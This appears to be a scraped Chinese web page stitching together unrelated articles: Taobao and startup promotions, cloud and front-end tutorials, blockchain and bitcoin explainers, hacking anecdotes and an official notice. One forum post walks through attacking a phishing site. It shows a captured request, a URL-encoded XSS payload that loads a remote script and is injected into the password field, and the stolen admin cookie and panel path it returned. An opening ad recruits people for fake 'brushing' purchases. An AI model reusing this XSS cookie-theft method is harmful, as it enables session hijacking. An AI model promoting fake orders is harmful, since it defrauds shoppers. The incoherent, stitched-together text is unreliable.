淘宝现在已经成为了中国的一座令人仰望的大山，几乎每个人都用过淘宝，几乎大部分人都有在淘宝买东西的习惯。

而淘宝影响力的背后，还有无数人围绕淘宝做出了一些赚钱的活儿，虽不能大富大贵，但也能让生活质量提高几个档次。

首先，写这篇文章之前，给大家讲一个比较容易让人理解的大数据。

淘宝里最赚钱的店铺是哪些？

是那些头部店铺。

最赚钱的永远是排名第一、第二的。原因在哪？在品类下这两家店铺可以被所有人看到，其次高销量的背书也更容易让人产生信任，更容易成交。

但是很多高销量的背后，都逃不开“运营”

你看到的成功都绝非单纯的偶然，更多的是必然。

最近我参加一个聚会，发现有好多人都是这个利益链条下的推动者。

他们的玩法各不同，相同的是，他们过的都还不错。

出于好奇，我向他们探讨了很多这方面的技巧和套路，我们也交流很很多自媒体的知识。

其实说白了，他们就是打造淘宝爆款的推动者。

他们会跟商家合作，在一个专业的平台上，接任务，按照平台的要求，去购买一些淘宝商品，最后获得本金+返利。

没什么别的要求，就是假装自己是真实客户，去询问商品质量，然后购买，几天后商家可能给你寄一瓶水，或者其他的任意小挂件，然后平台把本金和报酬都立即返给你。

你赚到了佣金，商家获得了人气。

一单可以挣到10块到40块、我本人也试了一下，虽不能挣什么大钱，但一天内挣个100块以内补贴下生活，还是可以的。

如果你每天有1个小时的空闲时间，或者是正在读书想赚点零用钱的朋友，长按识别下方的二维码，给你一个无法拒绝的理由。

遇到任何问题也可以咨询导师微信：

随着人工智能的应用与发展，未来3-5年，人工智能将出现在各行各业，70%左右的工作岗位，将被人工智能取代。科技迅猛的发展，为我们带来便利的同时，大多数人将无工可打。这是最好的时代，智能给人类生活带来便利前所未有，这也是最坏的，人们将面临社会分工的再次变革.

人无远虑，必有近忧，未来以非常残酷的速度扑面而来，你思考过吗？你准备好了吗？

未来最理想的生活方式就是，所有的商品由工业机器人生产，人类是产品的享用者，享受生活，享受人生！一个伟大的时代已经到来，2020打造7亿中产阶级，你参与了吗？

在这个互联网的时代，每个人都有自己的创业梦想，但是很多人由于自己没有资金，没有经验，没有人脉，从而陷入迷茫之中。但是今天有一个创业项目，只需要一部手机，一台电脑，在家就能创业。并且我们是互联网上，首个免费体验式创业系统，有人教有人帮，不受人脉的限制，兼职全职都可以。不发货不囤货，转发分享就秒结到账，这个项目更是未来最有趋势前景的项目。本项目，跟你的学历没有关系，跟你的人脉没有关系，跟你的经验没有关系，只跟你的学习力和梦想有关系。

巴菲特曾经说过，如果你没有找到一个，睡觉还赚钱的事业，你将一直工作到老。在这个新的时代，你和你的家人将活得非常辛苦。

如果你不甘于平庸，抓住这千载难逢的商机，请联系我，带你走进全球最佳创业平台，实现你有钱有闲的生活.相信是成功的开始，了解不会损失什么，拒绝了解，你将错失良机!

阅读 17 · 文章内容不代表UC平台观点

近年来，河南省南阳市将智慧城市建设作为城市转型发展的核心战略，并依托《南阳市智慧城市建设规划纲要》实施了一系列重要举措，南阳市政务云的规划建设便是其中的重要组成部分。

南阳市政务云按照“服务提供商建设运营、政府购买云服务”的模式运作，由南阳移动公司建设运营，华为公司提供云平台核心技术支持。该政务云除了提供基础的云主机、云存储、网络等IaaS（基础设施即服务）层服务,还提供了政务基础专题库、数据共享交换、政务大数据分析等PaaS（平台即服务）服务能力，是国内首个具备PaaS服务能力的政务云平台。

▲ 南阳市政务云整体逻辑架构

基础资源层（IaaS层）：支撑各个委办局的业务系统构建在统一的IT资源池上，通过对资源池的统一管理，实现资源的共享和弹性的发放，提升运维管理效率，为政府各委办局业务运行提供可靠、高效的基础资源服务。

平台服务层（PaaS层）：支撑ISV（独立软件供应商）的公共支撑组件服务化，如大数据组件、基础数据库、中间件、数据采集等，实现上层应用的快速调度和业务发放，提升应用构建的效率。同时，通过构建全市统一的四库（即：综合人口库、综合法人库、宏观经济库、电子证照库），实现全市的基础数据统一共享和交换，加速局委办的业务创新和服务质量的提升。

应用软件层（SaaS层）：基于华为PaaS平台开放的架构及PaaS层服务能力，可以快速集成国内主流政务应用软件厂商所提供的政务应用，如政府服务网、智慧城管、智慧医疗等，避免各居委办形成业务和数据的孤岛，提升各个局委办的服务能力和办事效率。

南阳政务云助力南阳市“互联网+政务服务”实现从IaaS到PaaS的跨越式发展，为南阳特色的智慧城市建设奠定了基础，为全国智慧城市的发展提供了宝贵的经验。

病毒

网络诈骗

个人信息被泄露……

类似的网络安全问题或网络违法犯罪行为

您或亲友遇到过吗？

为了推动政府部门和社会各界

加强网络共治共享

全国80余家网络安全社会组织

首次发起大规模的

网民网络安全感满意度调查活动

您的意见对未来的网络安全工作至关重要

您的信息也将得到充分保护

认真填答后可参与抽奖

谢谢您的参与

活动时间从9月3日开始到9月5日结束

你好，世界

https://preview.pro.ant.design/dashboard/analysis

技术选型

前端开发目前比较流行的框架不少，选择了React技术栈原因如下：

组件化的开发思想，非常适合写惯了JAVA、C++等面向对象语言代码的同学的思维模式

React有着活跃的开发生态，以及非常丰富的开源组件库，拿来既用，减少开发成本。

程序员写代码应该以商人的思维进行，能不自己动手的，绝对不要自己动手，我们不是科学家，我们做的是商用产品，开发成本越少，开发周期越短，我们生存的几率就越大。

安装Node.js

Node.js是一个Javascript运行环境(runtime environment)，开发模式下，我们需要安装Node.js才能运行本项目。

官网地址：https://nodejs.org/en/

安装Git

Git(读音为/g?t/。)是一个开源的分布式版本控制系统，我们用她来下载开源项目的代码。

相关教程：http://www.runoob.com/git/git-install-setup.html

安装包下载地址：https://gitforwindows.org/

安装完后，记得关闭git的换行符LF与CRLF自动转换功能，否则下载的Antd Pro代码在WebStorm上的去毛机上会提示错误。相关的说明参考：https://www.cnblogs.com/sdgf/p/6237847.html

安装Tortoisegit

Tortoisegit是git的可视化操作界面，通过Tortoisegit，可以很方便的操作git

安装包下载地址：https://tortoisegit.org/download/

安装WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源，继承了IntelliJ IDEA强大的JS部分的功能。（摘自百度百科）

官网地址：http://www.jetbrains.com/webstorm/

安装XAMPP

XAMPP（Apache+MySQL+PHP+PERL）是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP，但是为了避免误解，最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用，支持多语言：英文、简体中文、繁体中文、韩文、俄文、日文等。 [1]

许多人通过他们自己的经验认识到安装 Apache 服务器是件不容易的事儿。如果您想添加 MySQL、PHP 和 Perl，那就更难了。XAMPP 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用：只需下载，解压缩，启动即可。（摘自百度百科）

安装包下载地址：https://www.apachefriends.org/fr/download.html

下载Ant Design Pro

Antd是蚂蚁金服下面的一个开源项目，Ant Design Pro 是在antd上进行封装的一个项目模板，一个企业级中后台前端/设计解决方案。

Ant Design Pro项目地址：https://pro.ant.design/docs/getting-started-cn

体验Ant Design Pro

安装依赖。

启动项目。

此时浏览器就会打开一个网站，可以看到整个项目的最终效果。

注意：这里只是本地开发模式，还不是真正发布，不是真正的生产环境。

打包Ant Design Pro

当项目开发完毕，只需要运行一行命令就可以打包你的应用：

打包成功之后，会在根目录生成 文件夹，里面就是构建打包好的文件，通常是 、 、 等静态文件。

配置xampp作为生产环境

删除C:\xampp\htdocs

路径要根据xampp的实际安装目录调整

将上一步骤生成在dist文件夹中的文件全部拷贝到C:\xampp\htdocs

配置apache的正向代理，进行消息转化

用记事本打开C:\xampp\apache\conf\httpd.conf，在其最后面增加一行

ProxyPass /api http://127.0.0.1:8000/api，如下图所示：

启动apache

访问http://127.0.0.1

注意这个时候，网页能打开，但是凡是要从服务端获取的数据都无法显示，因为apache将消息重定向到http://127.0.0.1:8000/api，但是http://127.0.0.1:8000/api并没有相关的服务进程启动，所以无从获取数据。

开启服务器

这里的服务器可以是任何形式的服务器，可以是运行在tomcat的java项目，也可以是php，python等任何形式的服务器，这里为了方便，我们还是用Ant Design Pro开发模式作为服务器。

再次访问http://127.0.0.1，会发现所有页面的都已经能正常显示了。

开发模式和生产模式的区别

上面我们尝试了两种运行项目的方式，两者是有本质区别的，在后一种方式中，我们的服务器可以切换到任何形式的服务器，比如JAVA项目

java版本的服务器关键点

这里展示一个JAVA服务器的关键流程

配置struts.xml

捕获/api下面的消息，交由我们自己的类AntdApi进行分发

在AntdApi中配置相关的命令处理业务类

内部维护一个map，记录各个命令的实际处理类

根据请求的路径，将消息转发到相应的业务类进行处理

具体业务类就可以聚焦自己的业务逻辑了

下面是获取当前登录用户的业务类，代码非常清爽

一切可能改变未来的都在其列

日 智

|日本大幅增加科技预算，发力人工智能

据《日本经济新闻》报道，在日本2019年度预算的概算要求中，科学技术领域的预算额比2018年度的最初预算增长了13.3%，达到4.351万亿日元，这笔预算将重点用于人工智能（AI）相关技术的开发和人才培养等。此外，9月将在首相官邸举行专家会议，制定中长期AI战略，力争通过技术革新提高日本经济竞争力。（经济参考报）

|达观数据联合上海交通大学外国语学院建立语言智能实验室

36氪获悉，达观数据、上海交通大学、浦东软件园近日进行了产学研合作签约仪式，达观数据将联合上海交大外国语学院、浦东软件园共同建立语言智能实验室，在语料库建设、语言数字化平台、认知语言学等领域开展联合研究，共同推动语言智能的发展，并基于语言智能实验室，共同开展产学研的多维度合作。

|百度推出EZDL，没有编程经验也可训练AI

据VentureBeat报道，本周，针对那些没有足够财力或精力学习专业知识的人，百度发布了一个名为EZDL的在线工具，使得任何人不用编写一行代码就可以轻松地构建、设计和部署AI模型。百度AI技术生态部总经理喻友平表示，百度的EZDL在构建时以性能、易用性和安全性为基础，主要针对三大类机器学习：图像分类、物体检测和声音分类。（网易）

|华为发布首款智能音箱AICube，内置Alexa语音助手

据CNBC报道，华为在2018 IFA柏林消费电子展中公布了一款带路由器的智能音箱AI Cube，并计划今年年底在欧洲出售这款产品，但尚未公开定价。华为目前并未自主研发语音助手技术。内置Alexa使AI Cube拥有了德语、英语等多种语言的现成语音助手。（网易）

|李开复：AI能在15年内取代40%~50％岗位

创新工场董事长兼CEO、人工智能科学家李开复博士在《AI·未来》新书发布会上提到，在15年内，人工智能和自动化将具备取代40%~50％岗位的技术能力。不过，由于企业决策、工会影响和政府政策，实际过程中实现取代可能需要更长时间。对于这40%~50%的工作岗位，他在举例中提到了5个类别容易被取代，以及一些很难被取代的工作。（每日经济新闻）

如果我们能够找到一种大家认可的，可以确保信息记录不可篡改的方法，那就可以抛弃第三方信任角色。

文章字数1200 预计阅读时间5分钟

作者：Oliver Lee；配图：E.S LEE

第一章 认识区块链

不可篡改

如果你回家过年需要向亲戚朋友讲区块链，这篇文章能让你一分钟讲明白区块链最大的优点——数据不可篡改。

我们都有微信群，微信群的聊天记录就是不可篡改的。

一个微信群，有500人，每个人手机上都有聊天记录的一个完整备份。任何群友都不可能去修改别人手机上的聊天记录，只能修改自己的，哪怕是马老师也做不到修改别人手机的聊天记录的，腾讯只能修改自己服务器上的聊天记录。任何人都可以修改自己手机上的聊天记录，但别的群友可以指正，只要多个群友拿出证据，就可以证明这个心怀不轨的人修改了记录。

所以说，微信群的聊天记录就是一个不可篡改的数据库。

微信群里记录的是聊天记录，聊天记录不可篡改。而区块链也是存着一些特定的“聊天记录”，这些记录在区块链世界里有独特的名字——交易。这些历史交易使用区块链的方式保存就不可篡改。其原理是和微信群是一样的，就是所有玩这个区块链的人（被称为节点钱包）都完整地保留一份交易的历史记录。这样任何单个人想修改这些历史记录，别的人都可以拿出自己的那一份备份，来证明这些心怀不轨的人试图作弊。只要发现这样作弊的人，其他人就会将这个人孤立掉，直接踢出这个网络。

想一下如果你管理一家公司，你的财务账簿如果出现造假谁是最大的怀疑对象？很显然就是你的财务记账人员。

为了避免这种问题，我们会建立一些财务制度，比如复核员制度、定期审计制度、随机检查制度、对账制度等等，这些都会有一定效果，但都有共同的缺陷，就是滞后性以及串通一气的道德风险。

如果不考虑成本和效率的话，最有效的方法可以是这样，我们找1000个财务记账人员，每一笔记账业务都随机选择其中任意一个人来记账，每个人在记账时都必须对之前的账目进行一次审计，确认无误后记上当前这笔业务。当下一笔记账人选定后，将账本交给下一个人，下一个人在执行一遍审计，如此连续下去。

我们假设审计程序是固定的，正确执行的结果都会将账簿中的错误记录进行纠正。这样做的结果使每个人记假账的动作变得毫无意义。

这个情景中只有一个账簿，如果我们在记第一笔帐时让1000个人同时见证真实性，并每个人建立一个自己的账簿，之后的工作就会更简单一些，每个被选中的记账人将要记账的信息发给所有人，这些人都对当前业务和上一笔业务进行审计并给出正确或错误的提示，这就是区块链的共识记账逻辑。

我们可以相信，采取这种方式记录的信息是不可篡改的，如果你想修改历史数据，你必须换掉所有人手中的账簿，这很难做到；如果你要修改当前数据，你至少要把所有人手中账簿的上一笔记录都修改成和你的一样，同时还要保证你是被选中的当前信息发布者。

显然，不可篡改性是获得参与者信任的重要条件之一，区块链通过时间戳证明、首尾相连记账规则、哈希加密算法、共识机制等技术应用和机制设计，将记录不可篡改性做到极致。

每一个区块链项目都是由一个或多个“区块链”账簿组成，每个“区块链”都从生成第一个创始区块开始记账，这就是报纸的创刊号，编号为第0期。

如果这张报纸按照区块链的规则发行，那么从创刊号之后的第一期开始，上一期的全部内容要先用哈希算法加密成固定长度字符串，然后把本期的全部内容也哈希加密成固定长度字符串，两个字符串连在一起印在本期报纸的第一行，这个叫做区块头，然后就是本期报纸的全部正文，也就是本区块的具体内容，遵从这样的规则就实现了首尾相连的记账逻辑。

为什么这样首尾相连的记账就可靠呢？

我们需要先理解哈希的概念，哈希就是一个算法，能把任意长度的内容（无论是一个数，还是文章，图像，视频，总之就是任何数字化的信息）转换成一串看似没有规律的固定长度的数字（哈希值），并保证结果唯一，而从这个结果几乎没有办法推算出原始数据。

比如：数字1 的哈希结果是（下面是转换成16进制的字符串，一般我们用工具看到的都是16进制字符串）:

0x6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

既然哈希加密是可靠的，至少目前还是，我们可以忽略有人能够根据上面的65位乱码反推出区块内记录的详细信息，这使得哈希值可以被公开用来验证。

回到上面的首尾相连记账模式，每个区块记录都有个区块头，这里面用哈希加密方式记录了当前记账时间点上一个区块和本区块内容。

如果你作为一个记账人在记账时私自修改区块内信息，比如虚构一笔交易把别人的钱记到自己账户上，但是你可能忘了这是一个分布式数据库系统，网络上每个节点都拥有当前时间段要记账的区块信息，你的节点只是其中之一，那么你生成的新区快头就会跟别人不一样，系统会默认以多数人拥有相同信息为基础接受新的区块记账。

你的节点由于跟所有人都不一样，你被从链上抛弃，以后的信息都不会交给你帐了，这个就是分叉，悲哀的是这个叉上只有你自己。

而要想使你的修改生效，你必须让全网超过51%的节点都和你的区块信息一致，这样系统会认为你的数据是正确的，会抛弃另外49%的节点。当你知道节点数量可能是几十万、上千万的时候，相信你就会放弃这个想法了。

参考文献：本文转载火星财经专栏作者作品，版权归作者所有。

请转发分享给你的朋友,不要在上当受骗了。

下面是详细分析

今天在论坛看见两个说盗号的帖子

我就来简单分析一下大神勿喷

盗号二维码的指向为http://asdfg.b5069.cn/?_wv=3

首先可以用pc端浏览器打开 说明 这个网站不够完美。没有判断是不是手机端还是pc端

很多高明的钓鱼网站在PC端打开会直接跳转企鹅官方网站

我们怎么进攻这个钓鱼网站呢？

如果是我的话，我首先想到的是扫描他的后台地址 然后通过暴力破解后台账号密码

可以简单的尝试http://asdfg.b5069.cn/adminhttp://asdfg.b5069.cn/admin.php等等这些国际惯例的 后台地址

经过一番尝试 都是404O(∩_∩)O哈哈~ 比较菜 找不到后台地址

这个方法行不通，在而想到的是xss

通过xss可以获取后台地址 和 浏览后台当时的Cookie

因为盗号的人可能会在后台 查看盗取来的账号密码 所以我们把xss代码通过账号密码的途径种在他的后台里

然后我们现在来抓一下包

GET /index.php?name=12345678&pass=12345678 HTTP/1.1

Host: asdfg.b5069.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Referer:http://asdfg.b5069.cn/?_wv=3

Cookie: PHPSESSID=4o6eis0qc1l9n2rahhn2tufscn; Hm_lvt_939a35e2cad8dbce2b34fab2766a640b=1535808468; Hm_lpvt_939a35e2cad8dbce2b34fab2766a640b=1535808468

Connection: keep-alive

我使用1245678 的假账号 简单抓一下包 发现是 GET 方式 传输账号密码 一脸蒙 之前见都是Post方式的

既然这样就方便我们了种xss代码了

xss代码为

这个xss是在http://xsspt.com/ 里获取的 玩xss的都知道这个平台

这种是最基础的xss代码 一般后台加了防xss的 100%过滤

这个xss代码还有加工一下 随便一下 URL编码一下吧

%3Cscript%20src%3Dhttp%3A%2F%2Ft.cn%2FReaKqXf%3E%3C%2Fscript%3E

然后加在 刚刚协议的pass参数里 就像这样

http://asdfg.b5069.cn/index.php?name=12345678&pass=%3Cscript%20src%3Dhttp%3A%2F%2Ft.cn%2FReaKqXf%3E%3C%2Fscript%3E

为什么不加在name这个参数里呢 因为很明显 name 参数的值为账号 账号长度不超过10 如果后台判断一下很明显 种不进去 使用就加在密码里

简单的访问一下刚刚的那个地址

成功种进去了 现在就慢慢等我们的鱼打开 后台了

未完待续。。

时间 22:11

我们已经钓到鱼了 xss有效果了

返回的结果是

location : http://asdfg.965gm.cn/adminin/list.php

toplocation : http://asdfg.965gm.cn/adminin/list.php

cookie : admin_token=8bb1UF34graRk4K8T2oYJzDftbUNhFJGu0mEcN%2BMyQfvZ%2FdTJ%2BoCW6v%2FMAL9R%2B8IpjCVP7%2FjOovqqzcdzYQc76xiOjyp; PHPSESSID=08b5vpf0tigol38iml0qpamrh0; Hm_lvt_939a35e2cad8dbce2b34fab2766a640b=1535767223; Hm_lpvt_939a35e2cad8dbce2b34fab2766a640b=1535767302

opener :

比特币的转账额已超过PayPal，估计达1.3万亿美元。

（文章来源：巴比特资讯，版权归原平台所有）

作为全球市值最高的加密货币，比特币目前的年转总账额远高于PayPal，仅次于Visa。

有人认为，由于扩容问题，比特币无法达到一些传统支付服务所达到的转账速度。

然而，在比特币对战PayPa的争论中，这种观点没有任何分量。

比特币如何转账？

比特币没有账户的概念，转账的过程就是往区块链上写一条交易记录的过程。交易记录上有转出钱包地址、转入钱包地址、交易金额等。比特币钱包是管理钱包地址的软件，钱包地址就像银行账号，矿机是安装有挖矿软件的计算机，负责计算和记账。

一、广播

A要转比特币给F，钱包软件组装交易记录并发送所有的矿机结点(B、C、D 、E)

二、验证

B、C、D 、E接收到广播消息后，验证下A地址有没有足够的余额转账，验证成功后，往自己的本地“未确认交易池”里写一条记录，未确认交易池存放未打包成区块数据。

三、竞争记账

竞争抢记账权的过程就是比计算速度的过程。

在区块中存在一个随机数Nonce，运行比特币矿机的结点对区块整体数据不断的进行一个hash运算(具体算法为SHA256)，得到hash值，如果hash值不是以N个0开头的，就增加Nonce的值，重新再进行hash运算，直至找到这个解为止。

整个工作量证明的难易程度是由hash值0的个数N来决定的，比特币系统会根据当前整体的运算速率来进行调整N，从而保证平均每10分钟生成一个新的区块。

四、打包同步

获得记账权的矿机，把“未确认交易池”的记录打包成区块，同时广播给其他矿机：“我算完了，这里最近的交易记录和Nonce值都打包好，我发给你们确认下”。

1

转账额超越PayPal

ARK Invest的加密货币分析师雅西娜?埃尔曼迪拉(Yassine Elmandjra)表示，比特币转账的美元总额远远超过支付处理商PayPal的转账额。这一顶级加密货币的转账额也超过了发现信用卡（Discover）的已交易金额。

这位纽约的分析师表示，比特币在2018年的转账总额为1.3万亿美元，与领先的支付处理商Visa只相差“一个数量级”。

然而，埃尔曼迪拉也认为，我们不能将比特币与Visa或万事达(MasterCard)进行比较，因为它们的基础转账额并不大。但他同时指出，将它们作比较绝不是目的。

但是，这位分析师在推特上写道，自2013年以来，这一顶级加密货币的转账额出现了巨大增长。他还提供了一张图表，上面展示了Visa、万事达、银联和发现信用卡的转账额。

他接着指出，2017年，每天大约有价值30 - 40亿美元的比特币转账。真正增加的比特币转账交易不是在转账数量，而是总价值额，他发推道：

“

“注意，是转账的价值，而不是转账数量。”

”

2

赶上Visa并不容易

尽管到2018年，比特币的转账额将达到1.3万亿美元左右，但与Visa多年来的记录相比，这些数字显然微不足道。

Visa在2016年处理了超过8.9万亿美元的转账，这一美元支付巨头目前的数据是比特币的七倍左右。

然而，比特币的奋起直追似乎赢得了势头，这意味着目前看来不可能的事情在不久的将来可能会发生。

最早从2015年的数据来看，比特币的转账额有了惊人的增长。这一顶级虚拟资产在2017年达到了峰值，相比2016年的记录，其转账价值增长了近8倍。

比特币转账预计将在2018年及以后继续增长。如果它的表现与过去5年中80%的年增长率相匹配，它将挑战Visa并占据非常有利的位置。

随着比特币闪电网络(Bitcoin Lightning Network, LN)的实施，比特币的转账额可能会赶上Visa，甚至会在以后超越它。到那时，这一领先的数字货币理论上每年可以处理超过13万亿美元的转账额。

3

争论：价值和吞吐量孰重孰轻？

对于币圈的许多人来说，如果要与Visa等公司竞争，比特币需要找到解决其扩容问题的办法。然而，有一些人认为，加密货币的最初目的是永远不会与这些传统支付处理商进行比较或竞争。

是追求更高的转账吞吐量，还是让比特币只用于高价值交易？似乎比特币缓慢的网络和巨大的转账费用对“价值高于吞吐量”的支持者并不重要。

争论仍在继续，社区内的一些人坚持认为，比特币的应用程度不能只与转账价值挂钩。这是因为大多数涉及比特币的转账都是投机性交易。

要了解更多详情，请关注我们的官方平台

vSport官方社群

好莱坞认为，黑客就像是使用计算机的黑魔导士。在电影中，计算机可以炸毁房屋，关闭公路，释放瘟疫还有引发女权运动。也许有人认为，好莱坞的想象力很丰满，但现实是骨感的。他们错了，因为在现实中，确实也有如电影所描述的黑客行动，而且刺激程度绝对不亚于电影。

1、

逻辑炸弹引爆西伯利亚

在1982年，在里根gov时代CIA发现了克格勃从西方窃取技术已经很多年了。对此，美国中央情报局决定给克格勃设一个巨大的陷阱，而这个陷阱很有可能是历史上第一次使用的木马病毒。当时他们对于KGB要偷的东西已经有些了解，所以他们当时故意泄露出了一个“机密软件”：“强大”的用来帮助调整天然气管道项目的软件——CIA在软件里种下“逻辑炸弹”。

该软件的运行方式是如果切换到与初始不同的模式运行10万个周期后，逻辑炸弹将会启动。不过克格勃们不傻 – 他们检查他们偷的东西 – 但后来并没与发现什么异常。当时这个软件对于他们来说非常有帮助，刚好可以用在西伯利亚延伸到西欧的天然气管道建设项目中。

该程序在前几个月运行的很好（前面提到的10万次），但是在1982年6月，美国间谍卫星侦测到发生在西伯利亚管道建设工程工地一个非常大的爆炸。爆炸是3万吨，大约是五分之一投在广岛的原子弹的威力。当时美国的内刊描述，这是“从太空看到的最巨大的非核武器爆炸”。

2、

一台笔记本电脑让国防部的膝盖中了一箭

美国军方计算机网络被一种称为Agent.btz的蠕虫病毒入侵，而这个蠕虫来自于驻扎在阿富汗的一台笔记本电脑上，然后由优盘传播，成功进入被军方中央司令部。接下去，Agent.btz盗取了美国国务院和国防部的秘密材料，然后把这些绝密信息反馈给了未知的主人。

美国国防部马上启动了应急响应，由网军部门通过绝密网络隔离和删除恶意代码。可是Agent.btz有能力来扫描计算机以查找数据，然后打开后门，把自己复制到其他的网络，继续传输的数据和制造后门。此外，Agent.btz不断突变，下载新的代码来改变它的“签名”和逃避检测。后来更新，更复杂的变种Agent.btz出现在网络里，潜伏一年半之后，再次开始偷取机密文件。

最后你猜怎么着？美国军方采取了最原始的办法，将数百台电脑脱机，并重新格式化重装，然后把成千上万受感染的U盘全部销毁。最后才算勉强战胜了这个病毒。

3、

黑客“绑架”医疗记录并索取钱财

在2012年7月，一组黑客入侵了一个外科医生在医疗实践中的计算机网络，然后将整个数据库中病人的医疗记录和其他敏感文件进行加密处理，让其他人永远都看不到。之后黑客发布了一条信息说如果缴纳足额的赎金，才会将数据库恢复。然后外科医生们关闭了服务器，与警方联系，并通知他们的客户他们的信息已被泄露。

同样在2008年，处方药公司Express Scripts收到一封电子邮件，其中有75家客户的社会安全号码和处方记录，要求付出指定金额，以保持信息安全。当然，ExpressScripts决定，把其客户的利益放在第一，并拒绝支付，然后通过电子邮件告诉70万个他们的客户让他们知道，他们的信息已经可能被偷走。

4、

病毒间谍

它被称为火焰，这是一个大小为20兆的恶意程序，运行在几个中东国家特别是伊朗。火焰可以复制数据文件，捕捉敏感的截图，下载即时通讯单，远程开启计算机的麦克风和摄像头，记录正在发生在它附近任何谈话。

火焰接收命令和数据通过蓝牙系统，而且它也有天生的能力：假凭证，以避免被发现。它执行一个不起眼的加密技术被称为前缀碰撞攻击。另外它还可以将自己从被感染的计算机自动删除并毁灭它的所有痕迹。

火焰在头五年时间里伪装成Microsoft软件更新，直到后来偶然的一次机会才在伊朗被发现。伊朗指控美国和以色列的是他们制造了火焰，但是这两个国家不承认是它们干的。

5、

只针对伊朗核电厂的Stuxnet病毒

正如我们前面提到的第一项，事实证明，除了虚拟世界的东西，黑客同样会可以毁灭现实中的物体。2010年6月，一个名为Stuxnet处于休眠状态的病毒被世界各地的工厂、发电厂和交通控制系统的网络发现。奇怪的是，在每一个发现该病毒的系统中，这个病毒不会做任何事：就像是僵尸一样，但事实证明，Stuxnet正在等待。

病毒在一般情况下，只是像一个狼人一样暴力的破门而入，并开始破坏东西。 Stuxnet病毒则不同：它有一个特定的目标 – 伊朗的铀浓缩设施：位于纳坦兹的离心机，它的破坏性只能在那里被激活。后来事实证明，这些Stuxnet病毒控制了30％的纳坦兹设施的计算机，伊朗最后承认该病毒的存在，并暂时关闭了核设施和核电厂。

∑编辑 | Gemini

算法数学之美微信公众号欢迎赐稿

稿件涉及数学、物理、算法、计算机、编程等相关领域，经采用我们将奉上稿酬。

教育部办公厅关于成立教育部人工智能科技创新专家组的函

各省、自治区、直辖市教育厅（教委），新疆生产建设兵团教育局，有关部门（单位）教育司（局），部属各高等学校、部省合建各高等学校：

为落实《教育部关于印发高等学校人工智能创新行动计划的通知》（教技〔2018〕3号），加强科技界、教育界和产业界的沟通交流，推进科技创新、产业发展和人才培养形成合力，促进人工智能发展，经研究，决定成立教育部人工智能科技创新专家组（以下简称专家组）。

一、专家组性质

专家组在教育部组织下，对推动高校人工智能创新行动计划开展研究、咨询和指导，由咨询组和工作组组成。

二、主要任务

咨询组主要任务是对高校人工智能人才培养、科技创新和产学研合作等政策、规划提出咨询建议；工作组主要任务是承担咨询组日常工作，并接受教育部委托开展人工智能相关领域专项工作和专题研究等工作。

三、专家组组成

咨询组由高校、企业在人工智能领域具有战略思考、实践经验和影响力的专家学者组成；工作组由开展人工智能领域创新与实践基础好的高校相关专家组成。咨询组和工作组各设组长1名、副组长2名。

本届专家组任期自2018年8月1日起至2020年12月31日止。

附件1 教育部人工智能科技创新专家组咨询组专家名单：

附件2 教育部人工智能科技创新专家组工作组专家名单

干货分享

不管你看没看见

区块链正以空前速度颠覆各个行业

传统中心化运作伴随一系列风险

CTCH区块链市场预期就能完美解决

那么，它是怎么做到的呢

戳视频观看

长按扫描上方二维码

关注「SUMORE实验室」

获取更多娱乐视讯，技术干货分享

当前中国的新能源汽车制造呈现出比以往任何时期都更加繁荣的景象，新能源汽车为汽车制造业带来的变革效应正在日益显现。

就整车生产而言，固有的传统汽车厂商正在加码新能源汽车，在国家政策鼓励下，全新的新能汽车企业正在涌现。从新能源车全产业链的角度来看，自上游的电池供应商到后市场的充电设备供应商，整个产业链条因为新能源车市场的逐步打开而被空前激活。

未来3年内，中国新能源汽车将保持35%到40%的年增长率；到2020年，销量将达150万辆。

1

新能源汽车行业现状

目前新能源汽车生产企业虽然生产自动化水平有显著提高，但生产信息化水平不高，生产过程的管理水平还相对落后，如：

产周期相对较长，生产设备较多，而且不同生产段设备能力估算复杂，生产的不均衡、生产动态信息的不共享给现场管理带来巨大困难，缺少各个环节数据采集和实时透明化的手段即生产全过程追溯，缺乏系统化、图形化的排产工具，企业迫切需要采取详细准确的计划排产、作业调度、生产跟踪、现场半成品库存管理、物料管理等措施。

因此，加强各个生产段的现场管理势在必行，只有提升各个生产段的现场管理水平，才能早日实现新能源汽车生产质量和性能的提升。

将制造执行系统（MES）技术引入到新能源汽车的生产过程的管理中，解决其实际生产中存在的问题，将会极大提高企业生产水平。MES制造执行系统可帮助企业实现车间自动化系统信息化建设，是传统制造业信息传送的枢纽。帮助企业整合供应链，实现集成化的车间管理模式，提升车间自动化执行能力；打造精益化、可视化的自动化生产车间，提高生产透明度和生产效率，构建数字化工厂，实现智能制造。

2

新能源汽车智能制造的未来

工业大数据的汇集，无疑给智能制造带来了很多资源，而汽车产业作为制造业中技术含量、智能化程度较高，产业集中度较高的代表，将成为智能制造重要的应用领域和突破口，而且还将会带动整个产业链的转型升级。

未来，新能源汽车行业将加大推进与大数据的有机融合，以大数据助推新能源汽车产业快速发展，努力打造高端化、智能化、生态化的“中国制造2025”标志性新能源汽车产业集群。

通过嘉益仕LitWise MES解决方案，采集生产过程中的质量、设备、工艺、物料、检测等数据，为新能源汽车大数据分析平台的建立提供数据支持，在数据基础上形成信息，进而转化成知识、智慧，真正实现用数字定义企业，实现新能源汽车的智能制造。

3

新能源汽车MES解决方案

作为我国汽车产业转型升级的重要战略方向，新能源汽车是新一轮科技革命的重要载体，与传统的汽车行业信息化相比，新能源汽车的信息化建设有更高的要求——既要为新能源汽车的设计、生产、制造构建安全稳定的基础环境，还要结合智能化和数字化的新兴信息技术，为新能源汽车的业务模式创新提供动态灵活的技术平台。

